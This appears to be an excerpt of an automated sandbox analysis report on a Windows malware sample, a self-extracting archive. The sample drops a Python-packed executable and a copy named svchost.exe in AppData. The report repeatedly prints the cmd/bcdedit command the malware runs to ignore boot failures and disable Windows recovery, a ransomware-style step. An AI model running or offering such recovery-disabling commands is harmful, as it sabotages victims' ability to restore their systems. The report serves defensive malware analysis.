                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.iniJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: 4wx72yFLka.exeStatic file information: File size 18377488 > 1048576
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 4wx72yFLka.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: 4wx72yFLka.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4wx72yFLka.exe, 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp, 4wx72yFLka.exe, 00000000.00000000.1441129724.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Mai.exe, 00000004.00000002.2728305231.00007FFBA4840000.00000002.00000001.01000000.00000021.sdmp
                  Source: Binary string: ucrtbase.pdb source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Mai.exe, 00000004.00000002.2742453424.00007FFBBB3F6000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Mai.exe, 00000004.00000002.2744924304.00007FFBBC703000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Mai.exe, 00000004.00000002.2743543663.00007FFBBB430000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2741399937.00007FFBB4C47000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: .core.pdb.ico.pas source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Mai.exe, 00000004.00000002.2739578308.00007FFBAA2B2000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Mai.exe, 00000004.00000002.2744320710.00007FFBBC343000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2743176321.00007FFBBB40D000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Mai.exe, 00000004.00000002.2741731661.00007FFBB6298000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Mai.exe, 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Mai.exe, 00000004.00000002.2708525188.000001995DDB0000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: VCRUNTIME140.dll.2.drStatic PE information: 0xC94BF788 [Wed Jan 6 22:49:44 2077 UTC]
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6747609Jump to behavior
                  Source: 4wx72yFLka.exeStatic PE information: section name: .didat
                  Source: Mai.exe.0.drStatic PE information: section name: _RDATA
                  Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
                  Source: libcrypto-3.dll.2.drStatic PE information: section name: .00cfg
                  Source: libssl-3.dll.2.drStatic PE information: section name: .00cfg
                  Source: python311.dll.2.drStatic PE information: section name: PyRuntim
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00060640 push ecx; ret 0_2_00060653
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005FD4C push eax; ret 0_2_0005FD6A
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD695004 push rsp; retf 2_2_00007FF6DD695005
                  Source: C:\Users\user\Desktop\main.exeCode function: 3_2_00007FFB4B3800BD pushad ; iretd 3_2_00007FFB4B3800C1
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E0381 push rcx; ret 4_2_00007FFBA45E0385
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FFB4B3A00BD pushad ; iretd 5_2_00007FFB4B3A00C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4B3800BD pushad ; iretd 26_2_00007FFB4B3800C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 37_2_00007FFB4B3700BD pushad ; iretd 37_2_00007FFB4B3700C1

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with benign system names
                  Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                  Uses bcdedit to modify the Windows boot settings
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\python311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA256.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_Salsa20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_chacha20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32\pywintypes311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_sqlite3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_poly1305.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Math\_modexp.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_x25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libcrypto-3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\python3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_multiprocessing.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libffi-8.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_keccak.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pydJump to dropped file
